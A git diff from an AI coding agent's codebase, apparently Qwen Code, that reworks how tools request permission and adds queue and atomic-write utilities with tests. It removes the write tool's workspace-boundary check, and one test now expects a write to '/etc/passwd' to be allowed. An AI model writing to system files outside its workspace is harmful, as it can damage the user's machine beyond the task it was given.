'../permissions/types.js'; /** * Represents a validated and ready-to-execute tool call. @@ -39,12 +40,29 @@ export interface ToolInvocation< toolLocations(): ToolLocation[]; /** - * Determines if the tool should prompt for confirmation before execution. - * @returns Confirmation details or false if no confirmation is needed. + * Returns the tool's intrinsic permission for this invocation, based solely + * on its own parameters (without consulting PermissionManager). + * + * - `'allow'` — inherently safe (e.g., read-only commands, `cat`, `ls`). + * - `'ask'` — may have side effects, needs user or PM confirmation. + * - `'deny'` — security violation (e.g., command substitution in shell). + * + * The coreToolScheduler uses this as the *default* permission which may be + * overridden by PermissionManager rules at L4. */ - shouldConfirmExecute( + getDefaultPermission(): Promise; + + /** + * Constructs the confirmation dialog details for this invocation. + * Only called when the final permission decision is `'ask'` and the user + * needs to be prompted interactively. + * + * @param abortSignal Signal to cancel the operation. + * @returns The confirmation details for the UI to display. + */ + getConfirmationDetails( abortSignal: AbortSignal, - ): Promise; + ): Promise; /** * Executes the tool with the validated parameters. @@ -75,10 +93,37 @@ export abstract class BaseToolInvocation< return []; } - shouldConfirmExecute( + /** + * Default: read-only tools return 'allow'. Override in subclasses for + * tools with side effects. + */ + getDefaultPermission(): Promise { + return Promise.resolve('allow'); + } + + /** + * Default fallback: returns a generic 'info' confirmation dialog using the + * tool's getDescription(). This ensures that even tools whose + * getDefaultPermission() returns 'allow' can still be prompted when PM + * rules override the decision to 'ask' at L4. + * + * Tools with richer confirmation UIs (Shell, Edit, MCP, etc.) override this. 
+ */ + getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { - return Promise.resolve(false); + ): Promise { + const details: ToolInfoConfirmationDetails = { + type: 'info', + title: `Confirm ${this.constructor.name.replace(/Invocation$/, '')}`, + prompt: this.getDescription(), + onConfirm: async ( + _outcome: ToolConfirmationOutcome, + _payload?: ToolConfirmationPayload, + ) => { + // No-op: persistence is handled by coreToolScheduler via PM rules + }, + }; + return Promise.resolve(details); } abstract execute( @@ -447,7 +492,7 @@ export interface TaskResultDisplay { status: 'running' | 'completed' | 'failed' | 'cancelled'; terminateReason?: string; result?: string; - executionSummary?: SubagentStatsSummary; + executionSummary?: AgentStatsSummary; // If the subagent is awaiting approval for a tool call, // this contains the confirmation details for inline UI rendering. @@ -525,6 +570,7 @@ export interface PlanResultDisplay { type: 'plan_summary'; message: string; plan: string; + rejected?: boolean; } export interface ToolEditConfirmationDetails { @@ -534,6 +580,12 @@ export interface ToolEditConfirmationDetails { outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, ) => Promise; + /** + * When true, the UI should not show "Always allow" options (ProceedAlwaysProject/User). + * Set by coreToolScheduler when PM has an explicit 'ask' rule that would override + * any 'allow' rule the user might add. + */ + hideAlwaysAllow?: boolean; fileName: string; filePath: string; fileDiff: string; @@ -549,6 +601,10 @@ export interface ToolConfirmationPayload { newContent?: string; // used to provide custom cancellation message when outcome is Cancel cancelMessage?: string; + // Permission rules to persist when user selects ProceedAlwaysProject/User. + // Populated by the tool's getConfirmationDetails() and read by + // coreToolScheduler.handleConfirmationResponse() for persistence. 
+ permissionRules?: string[]; // used to pass user answers from ask_user_question tool answers?: Record; } @@ -560,13 +616,19 @@ export interface ToolExecuteConfirmationDetails { outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, ) => Promise; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; command: string; rootCommand: string; + /** Permission rules extracted by extractCommandRules(), used for display and persistence. */ + permissionRules?: string[]; } export interface ToolMcpConfirmationDetails { type: 'mcp'; title: string; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; serverName: string; toolName: string; toolDisplayName: string; @@ -574,14 +636,23 @@ export interface ToolMcpConfirmationDetails { outcome: ToolConfirmationOutcome, payload?: ToolConfirmationPayload, ) => Promise; + /** Permission rule for this MCP tool, e.g. 'mcp__server__tool'. */ + permissionRules?: string[]; } export interface ToolInfoConfirmationDetails { type: 'info'; title: string; - onConfirm: (outcome: ToolConfirmationOutcome) => Promise; + onConfirm: ( + outcome: ToolConfirmationOutcome, + payload?: ToolConfirmationPayload, + ) => Promise; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; prompt: string; urls?: string[]; + /** Permission rules for persistence, e.g. 'WebFetch(example.com)'. 
*/ + permissionRules?: string[]; } export type ToolCallConfirmationDetails = @@ -595,8 +666,13 @@ export type ToolCallConfirmationDetails = export interface ToolPlanConfirmationDetails { type: 'plan'; title: string; + /** @see ToolEditConfirmationDetails.hideAlwaysAllow */ + hideAlwaysAllow?: boolean; plan: string; - onConfirm: (outcome: ToolConfirmationOutcome) => Promise; + onConfirm: ( + outcome: ToolConfirmationOutcome, + payload?: ToolConfirmationPayload, + ) => Promise; } export interface ToolAskUserQuestionConfirmationDetails { @@ -628,8 +704,14 @@ export interface ToolAskUserQuestionConfirmationDetails { export enum ToolConfirmationOutcome { ProceedOnce = 'proceed_once', ProceedAlways = 'proceed_always', + /** @deprecated Use ProceedAlwaysProject or ProceedAlwaysUser instead. */ ProceedAlwaysServer = 'proceed_always_server', + /** @deprecated Use ProceedAlwaysProject or ProceedAlwaysUser instead. */ ProceedAlwaysTool = 'proceed_always_tool', + /** Persist the permission rule to the project settings (workspace scope). */ + ProceedAlwaysProject = 'proceed_always_project', + /** Persist the permission rule to the user settings (user scope). 
*/ + ProceedAlwaysUser = 'proceed_always_user', ModifyWithEditor = 'modify_with_editor', Cancel = 'cancel', } diff --git a/packages/core/src/tools/web-fetch.test.ts b/packages/core/src/tools/web-fetch.test.ts index cfa7b593d..93ef2826e 100644 --- a/packages/core/src/tools/web-fetch.test.ts +++ b/packages/core/src/tools/web-fetch.test.ts @@ -77,7 +77,7 @@ describe('WebFetchTool', () => { }); }); - describe('shouldConfirmExecute', () => { + describe('getConfirmationDetails', () => { it('should return confirmation details with the correct prompt and urls', async () => { const tool = new WebFetchTool(mockConfig); const params = { @@ -85,7 +85,9 @@ describe('WebFetchTool', () => { prompt: 'summarize this page', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); @@ -95,6 +97,7 @@ describe('WebFetchTool', () => { prompt: 'Fetch content from https://example.com and process with: summarize this page', urls: ['https://example.com'], + permissionRules: ['WebFetch(example.com)'], onConfirm: expect.any(Function), }); }); @@ -106,7 +109,9 @@ describe('WebFetchTool', () => { prompt: 'summarize the README', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); @@ -116,11 +121,12 @@ describe('WebFetchTool', () => { prompt: 'Fetch content from https://github.com/google/gemini-react/blob/main/README.md and process with: summarize the README', urls: ['https://github.com/google/gemini-react/blob/main/README.md'], + permissionRules: ['WebFetch(github.com)'], onConfirm: expect.any(Function), }); }); - it('should return false if approval mode 
is AUTO_EDIT', async () => { + it('should return ask even if approval mode is AUTO_EDIT (approval mode handled by scheduler)', async () => { const tool = new WebFetchTool({ ...mockConfig, getApprovalMode: () => ApprovalMode.AUTO_EDIT, @@ -130,14 +136,24 @@ describe('WebFetchTool', () => { prompt: 'summarize this page', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + expect(await invocation.getDefaultPermission()).toBe('ask'); + + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); - expect(confirmationDetails).toBe(false); + expect(confirmationDetails).toEqual({ + type: 'info', + title: 'Confirm Web Fetch', + prompt: + 'Fetch content from https://example.com and process with: summarize this page', + urls: ['https://example.com'], + permissionRules: ['WebFetch(example.com)'], + onConfirm: expect.any(Function), + }); }); - it('should call setApprovalMode when onConfirm is called with ProceedAlways', async () => { + it('should have onConfirm as a no-op (approval mode handled by scheduler)', async () => { const setApprovalMode = vi.fn(); const testConfig = { ...mockConfig, @@ -149,7 +165,7 @@ describe('WebFetchTool', () => { prompt: 'summarize this page', }; const invocation = tool.build(params); - const confirmationDetails = await invocation.shouldConfirmExecute( + const confirmationDetails = await invocation.getConfirmationDetails( new AbortController().signal, ); @@ -163,7 +179,8 @@ describe('WebFetchTool', () => { ); } - expect(setApprovalMode).toHaveBeenCalledWith(ApprovalMode.AUTO_EDIT); + // setApprovalMode should NOT be called — onConfirm is a no-op + expect(setApprovalMode).not.toHaveBeenCalled(); }); }); }); diff --git a/packages/core/src/tools/web-fetch.ts b/packages/core/src/tools/web-fetch.ts index 8240770d2..c0d04aed6 100644 --- a/packages/core/src/tools/web-fetch.ts +++ b/packages/core/src/tools/web-fetch.ts @@ -7,7 +7,6 @@ import { convert 
} from 'html-to-text'; import { ProxyAgent, setGlobalDispatcher } from 'undici'; import type { Config } from '../config/config.js'; -import { ApprovalMode } from '../config/config.js'; import { fetchWithTimeout, isPrivateIp } from '../utils/fetch.js'; import { getResponseText } from '../utils/partUtils.js'; import { ToolErrorType } from './tool-error.js'; @@ -15,13 +14,11 @@ import type { ToolCallConfirmationDetails, ToolInvocation, ToolResult, -} from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, - Kind, + ToolConfirmationPayload, ToolConfirmationOutcome, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { DEFAULT_QWEN_MODEL } from '../config/models.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; import { createDebugLogger, type DebugLogger } from '../utils/debugLogger.js'; @@ -151,26 +148,40 @@ ${textContent} return `Fetching content from ${this.params.url} and processing with prompt: "${displayPrompt}"`; } - override async shouldConfirmExecute(): Promise< - ToolCallConfirmationDetails | false - > { - // Auto-execute in AUTO_EDIT mode and PLAN mode (read-only tool) - if ( - this.config.getApprovalMode() === ApprovalMode.AUTO_EDIT || - this.config.getApprovalMode() === ApprovalMode.PLAN - ) { - return false; + /** + * WebFetch is a read-like tool (fetches content) but requires confirmation + * because it makes external network requests. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + /** + * Constructs the web fetch confirmation details. + */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { + // Extract the domain for the permission rule. 
+ let domain: string; + try { + domain = new URL(this.params.url).hostname; + } catch { + domain = this.params.url; } + const permissionRules = [`WebFetch(${domain})`]; const confirmationDetails: ToolCallConfirmationDetails = { type: 'info', title: `Confirm Web Fetch`, prompt: `Fetch content from ${this.params.url} and process with: ${this.params.prompt}`, urls: [this.params.url], - onConfirm: async (outcome: ToolConfirmationOutcome) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - this.config.setApprovalMode(ApprovalMode.AUTO_EDIT); - } + permissionRules, + onConfirm: async ( + _outcome: ToolConfirmationOutcome, + _payload?: ToolConfirmationPayload, + ) => { + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; diff --git a/packages/core/src/tools/web-search/index.ts b/packages/core/src/tools/web-search/index.ts index f8fcb8c60..142dd880f 100644 --- a/packages/core/src/tools/web-search/index.ts +++ b/packages/core/src/tools/web-search/index.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type { ToolConfirmationOutcome } from '../tools.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -11,12 +12,12 @@ import { type ToolInvocation, type ToolCallConfirmationDetails, type ToolInfoConfirmationDetails, - ToolConfirmationOutcome, + type ToolConfirmationPayload, } from '../tools.js'; +import type { PermissionDecision } from '../../permissions/types.js'; import { ToolErrorType } from '../tool-error.js'; import type { Config } from '../../config/config.js'; -import { ApprovalMode } from '../../config/config.js'; import { getErrorMessage } from '../../utils/errors.js'; import { createDebugLogger } from '../../utils/debugLogger.js'; import { buildContentWithSources } from './utils.js'; @@ -55,25 +56,32 @@ class WebSearchToolInvocation extends BaseToolInvocation< return ` (Searching the web via ${provider})`; } - override async shouldConfirmExecute( + /** + * WebSearch requires 
confirmation for external network requests. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + /** + * Constructs the web search confirmation details. + */ + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { - // Auto-execute in AUTO_EDIT mode and PLAN mode (read-only tool) - if ( - this.config.getApprovalMode() === ApprovalMode.AUTO_EDIT || - this.config.getApprovalMode() === ApprovalMode.PLAN - ) { - return false; - } + ): Promise { + // WebSearch is not domain-scoped: the permission rule is the bare tool name. + const permissionRules = [`WebSearch`]; const confirmationDetails: ToolInfoConfirmationDetails = { type: 'info', title: 'Confirm Web Search', prompt: `Search the web for: "${this.params.query}"`, - onConfirm: async (outcome: ToolConfirmationOutcome) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - this.config.setApprovalMode(ApprovalMode.AUTO_EDIT); - } + permissionRules, + onConfirm: async ( + _outcome: ToolConfirmationOutcome, + _payload?: ToolConfirmationPayload, + ) => { + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; diff --git a/packages/core/src/tools/write-file.test.ts b/packages/core/src/tools/write-file.test.ts index 057eb33dd..f4808cdc0 100644 --- a/packages/core/src/tools/write-file.test.ts +++ b/packages/core/src/tools/write-file.test.ts @@ -151,15 +151,14 @@ describe('WriteFileTool', () => { expect(() => tool.build(params)).toThrow(/File path must be absolute/); }); - it('should throw an error for a path outside root', () => { + it('should allow a path outside root (external path support)', () => { const outsidePath = path.resolve(tempDir, 'outside-root.txt'); const params = { file_path: outsidePath, content: 'hello', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); it('should throw an error if
path is a directory', () => { @@ -196,7 +195,15 @@ describe('WriteFileTool', () => { describe('shouldConfirmExecute', () => { const abortSignal = new AbortController().signal; - it('should return false if _getCorrectedFileContent returns an error', async () => { + it('should always return ask from getDefaultPermission', async () => { + const filePath = path.join(rootDir, 'confirm_permission_file.txt'); + const params = { file_path: filePath, content: 'test content' }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + }); + + it('should throw if _getCorrectedFileContent returns an error', async () => { const filePath = path.join(rootDir, 'confirm_error_file.txt'); const params = { file_path: filePath, content: 'test content' }; fs.writeFileSync(filePath, 'original', { mode: 0o000 }); @@ -207,39 +214,20 @@ describe('WriteFileTool', () => { ); const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(abortSignal); - expect(confirmation).toBe(false); + await expect( + invocation.getConfirmationDetails(abortSignal), + ).rejects.toThrow('Error reading existing file for confirmation'); fs.chmodSync(filePath, 0o600); }); - it('should return false and skip confirmation when approval mode is AUTO_EDIT', async () => { - mockConfigInternal.getApprovalMode.mockReturnValue( - ApprovalMode.AUTO_EDIT, - ); - const filePath = path.join(rootDir, 'auto_edit_skip_confirm.txt'); - const params = { file_path: filePath, content: 'content' }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(abortSignal); - expect(confirmation).toBe(false); - }); - - it('should return false and skip confirmation when approval mode is YOLO', async () => { - mockConfigInternal.getApprovalMode.mockReturnValue(ApprovalMode.YOLO); - const filePath = path.join(rootDir, 'yolo_skip_confirm.txt'); - const params = { file_path: 
filePath, content: 'content' }; - const invocation = tool.build(params); - const confirmation = await invocation.shouldConfirmExecute(abortSignal); - expect(confirmation).toBe(false); - }); - it('should request confirmation with diff for a new file', async () => { const filePath = path.join(rootDir, 'confirm_new_file.txt'); const proposedContent = 'Proposed new content for confirmation.'; const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -266,7 +254,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -298,7 +286,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: 'test' }; const invocation = tool.build(params); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -317,7 +305,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: 'test' }; const invocation = tool.build(params); - await invocation.shouldConfirmExecute(abortSignal); + await invocation.getConfirmationDetails(abortSignal); expect(mockIdeClient.openDiff).not.toHaveBeenCalled(); }); @@ -328,7 +316,7 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: 'test' }; const invocation = tool.build(params); - await invocation.shouldConfirmExecute(abortSignal); + await invocation.getConfirmationDetails(abortSignal); expect(mockIdeClient.openDiff).not.toHaveBeenCalled(); }); @@ -339,7 +327,7 @@ 
describe('WriteFileTool', () => { const invocation = tool.build(params); // This is the key part: get the confirmation details - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -367,7 +355,7 @@ describe('WriteFileTool', () => { }); mockIdeClient.openDiff.mockReturnValue(diffPromise); - const confirmation = (await invocation.shouldConfirmExecute( + const confirmation = (await invocation.getConfirmationDetails( abortSignal, )) as ToolEditConfirmationDetails; @@ -425,7 +413,8 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmDetails = await invocation.shouldConfirmExecute(abortSignal); + const confirmDetails = + await invocation.getConfirmationDetails(abortSignal); if ( typeof confirmDetails === 'object' && 'onConfirm' in confirmDetails && @@ -462,7 +451,8 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content: proposedContent }; const invocation = tool.build(params); - const confirmDetails = await invocation.shouldConfirmExecute(abortSignal); + const confirmDetails = + await invocation.getConfirmationDetails(abortSignal); if ( typeof confirmDetails === 'object' && 'onConfirm' in confirmDetails && @@ -526,7 +516,8 @@ describe('WriteFileTool', () => { const params = { file_path: filePath, content }; const invocation = tool.build(params); // Simulate confirmation if your logic requires it before execute, or remove if not needed for this path - const confirmDetails = await invocation.shouldConfirmExecute(abortSignal); + const confirmDetails = + await invocation.getConfirmationDetails(abortSignal); if ( typeof confirmDetails === 'object' && 'onConfirm' in confirmDetails && @@ -597,14 +588,13 @@ describe('WriteFileTool', () => { expect(() => tool.build(params)).not.toThrow(); }); - it('should reject paths outside 
workspace root', () => { + it('should allow paths outside workspace root (external path support)', () => { const params = { file_path: '/etc/passwd', - content: 'malicious', + content: 'test', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); }); diff --git a/packages/core/src/tools/write-file.ts b/packages/core/src/tools/write-file.ts index 9da02e4d4..1f1a30cdd 100644 --- a/packages/core/src/tools/write-file.ts +++ b/packages/core/src/tools/write-file.ts @@ -17,6 +17,7 @@ import type { ToolLocation, ToolResult, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { BaseDeclarativeTool, BaseToolInvocation, @@ -24,7 +25,7 @@ import { ToolConfirmationOutcome, } from './tools.js'; import { ToolErrorType } from './tool-error.js'; -import { FileEncoding } from '../services/fileSystemService.js'; +import { FileEncoding, needsUtf8Bom } from '../services/fileSystemService.js'; import { makeRelative, shortenPath } from '../utils/paths.js'; import { getErrorMessage, isNodeError } from '../utils/errors.js'; import { DEFAULT_DIFF_OPTIONS, getDiffStat } from './diffOptions.js'; @@ -94,14 +95,19 @@ class WriteFileToolInvocation extends BaseToolInvocation< return `Writing to ${shortenPath(relativePath)}`; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { - const mode = this.config.getApprovalMode(); - if (mode === ApprovalMode.AUTO_EDIT || mode === ApprovalMode.YOLO) { - return false; - } + /** + * Write operations always need user confirmation. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + /** + * Constructs the write-file diff confirmation details. 
+ */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { let originalContent = ''; const fileExists = await isFilefileExists(this.params.file_path); if (fileExists) { @@ -111,12 +117,12 @@ class WriteFileToolInvocation extends BaseToolInvocation< .readTextFile({ path: this.params.file_path }); originalContent = content; } catch (err) { - debugLogger.error( + throw new Error( `Error reading existing file for confirmation: ${getErrorMessage(err)}`, ); - return false; } } + const relativePath = makeRelative( this.params.file_path, this.config.getTargetDir(), @@ -212,7 +218,17 @@ class WriteFileToolInvocation extends BaseToolInvocation< if (!fileExists) { fs.mkdirSync(dirName, { recursive: true }); - useBOM = this.config.getDefaultFileEncoding() === FileEncoding.UTF8_BOM; + const userEncoding = this.config.getDefaultFileEncoding(); + if (userEncoding === FileEncoding.UTF8_BOM) { + // User explicitly configured UTF-8 BOM for all new files + useBOM = true; + } else if (userEncoding === undefined) { + // No explicit setting: auto-detect based on platform/extension. + // e.g. 
.ps1 on Windows with a non-UTF-8 code page needs BOM so + // PowerShell 5.1 reads the file as UTF-8 instead of the system ANSI page + useBOM = needsUtf8Bom(file_path); + } + // else: user explicitly set 'utf-8' (no BOM) — respect it detectedEncoding = undefined; } @@ -385,14 +401,6 @@ export class WriteFileTool return `File path must be absolute: ${filePath}`; } - const workspaceContext = this.config.getWorkspaceContext(); - if (!workspaceContext.isPathWithinWorkspace(filePath)) { - const directories = workspaceContext.getDirectories(); - return `File path must be within one of the workspace directories: ${directories.join( - ', ', - )}`; - } - try { if (fs.existsSync(filePath)) { const stats = fs.lstatSync(filePath); diff --git a/packages/core/src/utils/asyncMessageQueue.test.ts b/packages/core/src/utils/asyncMessageQueue.test.ts new file mode 100644 index 000000000..fe5421033 --- /dev/null +++ b/packages/core/src/utils/asyncMessageQueue.test.ts @@ -0,0 +1,75 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect } from 'vitest'; +import { AsyncMessageQueue } from './asyncMessageQueue.js'; + +describe('AsyncMessageQueue', () => { + it('should dequeue items in FIFO order', () => { + const queue = new AsyncMessageQueue(); + queue.enqueue('a'); + queue.enqueue('b'); + queue.enqueue('c'); + + expect(queue.dequeue()).toBe('a'); + expect(queue.dequeue()).toBe('b'); + expect(queue.dequeue()).toBe('c'); + }); + + it('should return null when empty', () => { + const queue = new AsyncMessageQueue(); + expect(queue.dequeue()).toBeNull(); + }); + + it('should return remaining items then null after drain()', () => { + const queue = new AsyncMessageQueue(); + queue.enqueue('x'); + queue.enqueue('y'); + + queue.drain(); + + expect(queue.dequeue()).toBe('x'); + expect(queue.dequeue()).toBe('y'); + expect(queue.dequeue()).toBeNull(); + }); + + it('should silently drop items enqueued after drain()', () => { + const 
queue = new AsyncMessageQueue(); + queue.drain(); + queue.enqueue('dropped'); + + expect(queue.size).toBe(0); + }); + + it('should track size accurately', () => { + const queue = new AsyncMessageQueue(); + expect(queue.size).toBe(0); + + queue.enqueue(1); + queue.enqueue(2); + expect(queue.size).toBe(2); + + queue.dequeue(); + expect(queue.size).toBe(1); + }); + + it('should report isDrained correctly', () => { + const queue = new AsyncMessageQueue(); + expect(queue.isDrained).toBe(false); + + queue.drain(); + expect(queue.isDrained).toBe(true); + }); + + it('should handle multiple sequential enqueue-dequeue cycles', () => { + const queue = new AsyncMessageQueue(); + + for (let i = 0; i < 5; i++) { + queue.enqueue(i); + expect(queue.dequeue()).toBe(i); + } + }); +}); diff --git a/packages/core/src/utils/asyncMessageQueue.ts b/packages/core/src/utils/asyncMessageQueue.ts new file mode 100644 index 000000000..3268718ef --- /dev/null +++ b/packages/core/src/utils/asyncMessageQueue.ts @@ -0,0 +1,54 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Generic non-blocking message queue. + * + * Simple FIFO queue for producer/consumer patterns. Dequeue is + * non-blocking — returns null when empty. The consumer decides + * when and how to process items. + */ + +/** + * A generic non-blocking message queue. + * + * - `enqueue(item)` adds an item. Silently dropped after `drain()`. + * - `dequeue()` returns the next item, or `null` if empty. + * - `drain()` signals that no more items will be enqueued. + */ +export class AsyncMessageQueue { + private items: T[] = []; + private drained = false; + + /** Add an item to the queue. Dropped silently after drain. */ + enqueue(item: T): void { + if (this.drained) return; + this.items.push(item); + } + + /** Remove and return the next item, or null if empty. 
*/ + dequeue(): T | null { + if (this.items.length > 0) { + return this.items.shift()!; + } + return null; + } + + /** Signal that no more items will be enqueued. */ + drain(): void { + this.drained = true; + } + + /** Number of items currently in the queue. */ + get size(): number { + return this.items.length; + } + + /** Whether `drain()` has been called. */ + get isDrained(): boolean { + return this.drained; + } +} diff --git a/packages/core/src/utils/atomicFileWrite.test.ts b/packages/core/src/utils/atomicFileWrite.test.ts new file mode 100644 index 000000000..7d30caed0 --- /dev/null +++ b/packages/core/src/utils/atomicFileWrite.test.ts @@ -0,0 +1,63 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import { atomicWriteJSON } from './atomicFileWrite.js'; + +describe('atomicWriteJSON', () => { + let tmpDir: string; + + beforeEach(async () => { + tmpDir = await fs.mkdtemp(path.join(os.tmpdir(), 'atomic-write-test-')); + }); + + afterEach(async () => { + await fs.rm(tmpDir, { recursive: true, force: true }); + }); + + it('should write valid JSON to the target file', async () => { + const filePath = path.join(tmpDir, 'test.json'); + const data = { hello: 'world', count: 42 }; + + await atomicWriteJSON(filePath, data); + + const content = await fs.readFile(filePath, 'utf-8'); + expect(JSON.parse(content)).toEqual(data); + }); + + it('should pretty-print with 2-space indent', async () => { + const filePath = path.join(tmpDir, 'test.json'); + await atomicWriteJSON(filePath, { a: 1 }); + + const content = await fs.readFile(filePath, 'utf-8'); + expect(content).toBe(JSON.stringify({ a: 1 }, null, 2)); + }); + + it('should overwrite existing file atomically', async () => { + const filePath = path.join(tmpDir, 'test.json'); + await 
atomicWriteJSON(filePath, { version: 1 }); + await atomicWriteJSON(filePath, { version: 2 }); + + const content = await fs.readFile(filePath, 'utf-8'); + expect(JSON.parse(content)).toEqual({ version: 2 }); + }); + + it('should not leave temp files on success', async () => { + const filePath = path.join(tmpDir, 'test.json'); + await atomicWriteJSON(filePath, { ok: true }); + + const files = await fs.readdir(tmpDir); + expect(files).toEqual(['test.json']); + }); + + it('should throw if parent directory does not exist', async () => { + const filePath = path.join(tmpDir, 'nonexistent', 'test.json'); + await expect(atomicWriteJSON(filePath, {})).rejects.toThrow(); + }); +}); diff --git a/packages/core/src/utils/atomicFileWrite.ts b/packages/core/src/utils/atomicFileWrite.ts new file mode 100644 index 000000000..e79a05738 --- /dev/null +++ b/packages/core/src/utils/atomicFileWrite.ts @@ -0,0 +1,72 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as crypto from 'node:crypto'; +import * as fs from 'node:fs/promises'; +import { isNodeError } from './errors.js'; + +export interface AtomicWriteOptions { + /** Number of rename retries on EPERM/EACCES (default: 3). */ + retries?: number; + /** Base delay in ms for exponential backoff (default: 50). */ + delayMs?: number; +} + +/** + * Atomically write a JSON value to a file. + * + * Writes to a temporary file first, then renames it to the target path. + * On POSIX `fs.rename` is atomic, so readers never see a partial file. + * On Windows the rename can fail with EPERM under concurrent access, + * so we retry with exponential backoff. + * + * The parent directory of `filePath` must already exist. + */ +export async function atomicWriteJSON( + filePath: string, + data: unknown, + options?: AtomicWriteOptions, +): Promise { + const retries = options?.retries ?? 3; + const delayMs = options?.delayMs ?? 
50; + + const tmpPath = `${filePath}.${crypto.randomBytes(4).toString('hex')}.tmp`; + try { + await fs.writeFile(tmpPath, JSON.stringify(data, null, 2), 'utf-8'); + await renameWithRetry(tmpPath, filePath, retries, delayMs); + } catch (error) { + try { + await fs.unlink(tmpPath); + } catch { + // Ignore cleanup errors + } + throw error; + } +} + +async function renameWithRetry( + src: string, + dest: string, + retries: number, + delayMs: number, +): Promise { + for (let attempt = 0; attempt <= retries; attempt++) { + try { + await fs.rename(src, dest); + return; + } catch (error: unknown) { + const isRetryable = + isNodeError(error) && + (error.code === 'EPERM' || error.code === 'EACCES'); + if (!isRetryable || attempt === retries) { + throw error; + } + await new Promise((resolve) => + setTimeout(resolve, delayMs * 2 ** attempt), + ); + } + } +} diff --git a/packages/core/src/utils/environmentContext.test.ts b/packages/core/src/utils/environmentContext.test.ts index 0b24a9b01..6c2258c78 100644 --- a/packages/core/src/utils/environmentContext.test.ts +++ b/packages/core/src/utils/environmentContext.test.ts @@ -18,6 +18,7 @@ import { getEnvironmentContext, getDirectoryContextString, getInitialChatHistory, + stripStartupContext, } from './environmentContext.js'; import type { Config } from '../config/config.js'; import { getFolderStructure } from './getFolderStructure.js'; @@ -223,3 +224,76 @@ describe('getInitialChatHistory', () => { expect(history).toEqual([]); }); }); + +describe('stripStartupContext', () => { + it('should strip the env context + model ack from the start of history', () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'This is the Qwen Code...' }] }, + { + role: 'model', + parts: [{ text: 'Got it. Thanks for the context!' 
